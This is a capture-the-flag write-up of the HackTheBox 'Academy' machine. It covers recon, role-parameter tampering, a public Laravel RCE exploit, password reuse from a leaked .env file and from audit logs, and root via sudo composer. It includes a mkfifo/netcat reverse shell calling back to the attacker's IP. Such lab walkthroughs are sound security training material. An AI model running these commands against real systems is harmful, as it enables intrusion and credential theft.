> For the complete documentation index, see [llms.txt](https://robertos-notebook.gitbook.io/cybersecurity/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/academy.md).

# Academy

Academy is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/297), created by egre55 and mrb3n. In the current post, my IP is 10.10.14.44, and the target IP is 10.129.167.56

This machine features an apache server hosting a PHP website. The website doesn't look special until you intercept the registration process, where you can change a obvious parameter to change your privileges to that account, then when you fuzz the website, you find an admin login url. In that URL there is an sub-domain with error logs from Laravel, revealing in the process the API\_KEY used for an exploit for RCE. Inside the machine, there are a lot of techniques used to pivot between users and the change your user to root.

### Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.167.56

Pinging 10.129.167.56 with 32 bytes of data:
Reply from 10.129.167.56: bytes=32 time=141ms TTL=63
Reply from 10.129.167.56: bytes=32 time=173ms TTL=63
Reply from 10.129.167.56: bytes=32 time=142ms TTL=63
Reply from 10.129.167.56: bytes=32 time=144ms TTL=63

Ping statistics for 10.129.167.56:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 141ms, Maximum = 173ms, Average = 150ms
```

{% endcode %}

By the TTL, we can assume that is a Linux Machine.

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.167.56 -oN Ports

Nmap scan report for 10.129.167.56
Host is up, received reset ttl 63 (0.16s latency).
Scanned at 2023-06-06 10:37:16 Pacific SA Standard Time for 16s
Not shown: 65283 closed tcp ports (reset), 249 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
33060/tcp open  mysqlx  syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
           Raw packets sent: 76803 (3.379MB) | Rcvd: 74737 (2.990MB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target

Nmap scan report for 10.129.167.56
Host is up (0.15s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=6/6%Time=647F44D8%P=i686-pc-windows-windows%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.95 seconds
```

{% endcode %}

If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version.

Information that we have now: It's a website (port 80) that use Apache/2.4.41, with an open **mysqlx** (port 33060), there is no response for now.

Because of the following message "Did not follow redirect to <http://academy.htb/>" we have to [add the IP to /etc/hosts/](/cybersecurity/cybersecurity/tip-and-tricks/add-host.md)

{% code title="Local Terminal" %}

```bash
$ whatweb http://academy.htb

http://academy.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.167.56], 
Title[Hack The Box Academy]
```

{% endcode %}

* Browser: <http://academy.htb/>

If you go to Login, the URL is "<http://academy.htb/login.php>", this is a good opportunity to fuzz with php termination.

{% code title="Local Terminal" %}

```bash
wfuzz -c -f PHPfuzz -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://academy.htb/FUZZ.php
```

{% endcode %}

```javascript
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://academy.htb/FUZZ.php
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        76 L     131 W      2117 Ch     "index"
000000039:   200        141 L    226 W      2627 Ch     "login"
000000245:   200        141 L    227 W      2633 Ch     "admin"
000000024:   302        1049 L   4114 W     55034 Ch    "home"
000000051:   200        148 L    247 W      3003 Ch     "register"
000001476:   200        0 L      0 W        0 Ch        "config"
000045226:   403        9 L      28 W       276 Ch      "http://academy.htb/.php"
```

* Index.php: Nothing
* login.php: useful after registration.
* admin.php: Admin login panel, it could be useful.
* home.php: Redirect to login.php
* register.php: Registration form.
* config.php: 403, Empty

Our alternatives now is to intercept the registration panel with burpsuite.

![](/files/GJ0H9faDHI9tn3TjvnF4)

<figure><img src="/files/jImoDMifN6ZDbzU5Mmpb" alt=""><figcaption><p>Interception result</p></figcaption></figure>

### Exploitation

At the response, we can see that between the parameters, there is a "roleid", before we found an admin.php.

So, our best action is to change the roleid to 1 and create a new account.

<figure><img src="/files/Nw7B6MVjX7sJWBDSW7Ux" alt=""><figcaption><p>Send this</p></figcaption></figure>

Then, go to <http://academy.htb/admin.php> and login with the new user... after this, you will see the following thing:

<figure><img src="/files/6Wy9z9Vri6tr34YrENJ8" alt=""><figcaption></figcaption></figure>

Hey! There is a subdomain, add it to /etc/hosts.

* <http://dev-staging-01.academy.htb/>

<figure><img src="/files/LJjLIOLl6M8GOPiD7sBb" alt=""><figcaption></figcaption></figure>

### Reverse Shell \[www-data]

The website shows a Laravel error, maybe it could be vulnerable to something, search it at exploit-db.com. I tried the [CVE-2021-3129](https://www.exploit-db.com/exploits/49424) but it doesn't work. And the [CVE-2018-15133](https://www.exploit-db.com/exploits/47129) requieres metasploit, but there are alternatives at github.

{% embed url="<https://github.com/aljavier/exploit_laravel_cve-2018-15133>" %}

{% code title="Local Terminal" %}

```bash
git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133
```

{% endcode %}

The structure of the command is the following:

```
pwn_laravel.py [-h] [-c COMMAND] [-m {1,2,3,4}] [-i] URL API_KEY
```

<figure><img src="/files/sJklPrbUhlRzZI48yy0x" alt=""><figcaption><p>API_key location</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive
```

{% endcode %}

Now, open a new local terminal

{% code title="Local Terminal B" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="CVE Interactive Terminal" %}

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 443 >/tmp/f
```

{% endcode %}

And you are in! Close the **CVE Interactive Terminal** and do a [**Bash Upgrade** ](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md)at the other terminal

### User Pivoting \[cry0l1t3]

{% code title="Target Terminal \[www-data]" %}

```bash
www-data@academy:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@academy:/var/www/html$ ls -la
total 20
drwxr-xr-x  4 root     root     4096 Aug 13  2020 .
drwxr-xr-x  3 root     root     4096 Aug  7  2020 ..
drwxr-xr-x 12 www-data www-data 4096 Aug 13  2020 academy
drwxr-xr-x 12 root     root     4096 Aug 13  2020 htb-academy-dev-01
-rw-r--r--  1 www-data www-data   50 Aug  9  2020 index.php

# We are at -dev-, is a good idea to check the current working files at academy
www-data@academy:/var/www/html$ cd academy/

www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13  2020 .
drwxr-xr-x  4 root     root       4096 Aug 13  2020 ..
-rw-r--r--  1 www-data www-data    706 Aug 13  2020 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
<...>
```

{% endcode %}

There is an interesting hidden file called .env, type **cat .env**

{% code title="Target Terminal \[www-data]" %}

```bash
AAPP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!! #Password!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
```

{% endcode %}

Now we can test that password with other users, we can enumerate them at /home

{% code title=" Target Terminal \[www-data]" %}

```python
www-data@academy:/home$ ls -l

total 32
drwxr-xr-x  2 21y4d    21y4d    4096 Aug 10  2020 21y4d
drwxr-xr-x  2 ch4p     ch4p     4096 Aug 10  2020 ch4p
drwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 cry0l1t3
drwxr-xr-x  3 egre55   egre55   4096 Aug 10  2020 egre55
drwxr-xr-x  2 g0blin   g0blin   4096 Aug 10  2020 g0blin
drwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12  2020 mrb3n
```

{% endcode %}

After testing with each { $user : mySup3rP4s5w0rd!! } the correct one is cry0l1t3

{% code title="Target Terminal \[www-data]" %}

```bash
$ su cry0l1t3

$ cat /home/cry0l1t3/user.txt
```

{% endcode %}

### User Pivoting \[mrb3n]

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
```

{% endcode %}

The user is from the group **adm**, maybe we can use an specific command or read some logs.&#x20;

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
$ cd /

$ find \-group adm 2>/dev/null
<...>
./var/log/apt/term.log.3.gz
./var/log/apt/term.log.1.gz
./var/log/apt/term.log.4.gz
./var/log/apt/term.log
./var/log/audit
./var/log/audit/audit.log.2
./var/log/audit/audit.log
./var/log/audit/audit.log.3
./var/log/audit/audit.log.1
./var/log/syslog.4.gz
./var/log/syslog.7.gz
./var/log/auth.log.2.gz
./var/log/auth.log.1
./var/log/syslog.3.gz
<...>
```

{% endcode %}

Usually the logs located at /var/log/audit/ are important, but they have a LOT of information, a good alternative is to use "grep" to find relevant data.

{% code title=" Target Terminal \[cry0l1t3]" %}

```bash
$ cd /var/log/audit/

# Remember that our current uid is 1002, so we need another one.
$ grep -r "uid=1001" | grep "cmd"
audit.log:type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success'
<...>

# From here, we want:
# 2F7573722F62696E2F656469746F72202D2D202F
# Between "cmd=" and "terminal=
```

{% endcode %}

From here, we want a hash like "2F7573722F62696E2F656469746F72202D2D202F" between **cmd=** and **Terminal=,** to apply **xxd -ps -r**

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r "uid=1001" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r
```

{% endcode %}

Nothing here, now we will tesst with uid=1000

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r "uid=1000" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r
```

{% endcode %}

But there is another interesting rows, the ones that contain "TYPE=tty" and "data="

{% code title="Target Terminal \[cry0l1t3]" %}

```bash
grep -r tty | grep -oP '(?<=data=).*' | sort -u | xxd -ps -r ; echo
```

{% endcode %}

```bash
exithistory
mrb3n_Ac@d3my!
su mrb3n
whoami
cat dat
<...>
```

{% code title=" Target Terminal \[cry0l1t3]" %}

```bash
su mrb3n   # Password: mrb3n_Ac@d3my!
```

{% endcode %}

### Privileges Escalation

{% code title="Target Terminal \[mrb3n]" %}

```bash
$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
```

{% endcode %}

At GTFOBin there is a way to escalate privileges with sudo using composer

{% embed url="<https://gtfobins.github.io/gtfobins/composer/#sudo>" %}

{% code title="Target Terminal \[mrb3n]" %}

```bash
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
$ whoami
root

$ cat /root/root.txt
e13da1f49d8d784bffa5504154a3d8f8
```

{% endcode %}
